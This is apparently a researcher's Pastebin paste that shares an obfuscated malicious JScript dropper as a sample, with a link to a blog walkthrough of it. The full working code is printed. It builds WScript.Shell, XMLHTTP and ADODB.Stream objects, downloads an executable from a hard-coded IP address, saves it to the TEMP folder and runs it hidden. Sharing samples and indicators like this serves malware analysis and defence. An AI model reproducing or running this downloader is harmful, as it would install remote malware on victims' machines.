Neonprimetime

Malicious Javascript 46.30.45.73/mert.exe

Nov 25th, 2015
218
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Malicious Javascript
  2. ******
  3. Blog about this javascript: http://neonprimetime.blogspot.com/2015/11/malicious-javascript-walk-thru.html
  4. ****
  5. Destination IP: 46.30.45.73/mert.exe
  6. ****
  7. (
  8. function (olcdENyNGCBd) {
  9. function kKVXeV(msezIazw) {
  10. return new olcdENyNGCBd.ActiveXObject(msezIazw)
  11. }
  12. var kMFFvyAqh = true, mEwAroXP = ("B.St"+(221404, "ream"));
  13. var kbtEwr;
  14. kbtEwr = function (CJxJzZ, XuSlNgfI, SoRNuldTayYND) {
  15. tbWEefAFUAZSaO=((1/*s987111nuM69919eOiZ*/)?"WScri":"")+"pt.Shell";
  16. var CCPoAXzX = kKVXeV(tbWEefAFUAZSaO);
  17. var pPDVaIAYVOIp = "2.XMLHTTP";
  18. var CtsZjtNlqpP = kKVXeV("MSXML"+(381144, pPDVaIAYVOIp));
  19. var tndpSoRVjetRf = "%TEMP%\\";
  20. var bIVrpPKIHb = CCPoAXzX["Expa"+/*s925956nM261933eOZ*/"ndEnvironmentStrings"](tndpSoRVjetRf)
  21. var XuSlNgfI = bIVrpPKIHb +(437532602659, XuSlNgfI);
  22. CtsZjtNlqpP.onreadystatechange = function (){
  23. if (CtsZjtNlqpP.readyState == 4){
  24. kMFFvyAqh = false;
  25. with(kKVXeV("ADOD" + mEwAroXP)){
  26. open();
  27. type = 1;
  28. write(CtsZjtNlqpP.ResponseBody);
  29. saveToFile(XuSlNgfI, 2);
  30. close();
  31. return XuSlNgfI;
  32. }
  33. }
  34. }
  35. CtsZjtNlqpP.open("G" + (3828034, 4609216, /*dca645894zYtzkrxTK747381IlaIWQJrHGjLqXIjNQmXamgjYPW*/ "ET" /*dcazYtzkrx637703TKIlaIWQJr683091HGjLqXIjNQmX29671amgjYPW*/), CJxJzZ, false);
  36. CtsZjtNlqpP.send();
  37. yimseHvs = olcdENyNGCBd.WScript.Sleep(1100)
  38. while (kMFFvyAqh) {yimseHvs}
  39. if (((new Date())>0,1656))
  40. CCPoAXzX.Run(XuSlNgfI, 0, 0);
  41. }
  42. XkpYNx = "h";
  43. XkpYNx += "t"; /*XkpYNxCtsZjtNlqpPkKVXeV*/
  44. XkpYNx += "tp";
  45. kbtEwr(XkpYNx + "://" + "46.30.45.73/mert.e"+"x"+"e", "115987449.exe", 1);
  46. }
  47. )
  48. (this) /*507952955735917811792346152771*/
RAW Paste Data